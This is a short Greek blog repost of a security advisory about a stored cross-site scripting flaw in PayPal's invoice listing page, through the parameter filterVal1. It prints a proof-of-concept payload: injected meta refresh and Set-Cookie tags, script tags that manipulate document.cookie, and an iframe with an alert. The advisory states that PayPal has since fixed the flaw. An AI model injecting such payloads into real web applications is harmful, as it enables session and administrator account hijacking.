
Τα σφάλματα επιτρέπουν στους επιτιθέμενους να εισάγουν απομακρυσμένα κακόβουλο κώδικα στην εφαρμογή. Η ευπάθεια βρίσκεται στην .......
ενότητα Artikel pro Seite με συνοδευόμενη<…>
ευάλωτη παράμετρο filterVal1.
Η απομακρυσμένη εκμετάλλευση δεν απαιτεί εξελιγμένα μέτρα ή προνομιακό λογαριασμό χρήστη και μπορεί να οδηγήσει στην κλοπή λογαριασμού του διαχειριστή.
Proof of Concept:
Review: [ALL Listing] (index) Rechnungen Verwalten - Geld Anfordern > Artikel pro Seite (Listing) > filterVal1
var currencyVals = ["EUR", "AUD", "BRL", "GBP", "DKK", "HKD", "ILS", "JPY", "CAD", "MXN", "TWD", "NZD", "NOK", "PHP",
"PLN", "SEK", "CHF", "SGD", "THB", "CZK", "HUF", "USD", ""];
var txt1 = “zwischen”;
var txt2 = ” und “;
var txtLabel = “Wert 2″;
var advFilter = “email”;
var dateFilter = “invoice_date”;
var filterVal1 = “<meta http-equiv=”refresh” content=”0;url=javascript:document.cookie=true;”> <META HTTP-EQUIV=”Set-Cookie”
Content=”USERID=<SCRIPT>document.cookie=true</script>”> <script>document.cookie=true;</script>
PoC: “><iframe src=http://vuln-lab.com onload=alert(“VulnerabilityLab”) <
Το μέγεθος της επικινδυνότητας της ευπάθειας είναι μέτριο, παρόλα αυτά η PayPal έχει ενημερώσει το σύστημα.
Πηγή: http://www.secnews.gr/archives/54045
http://logiosermis.net/t
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου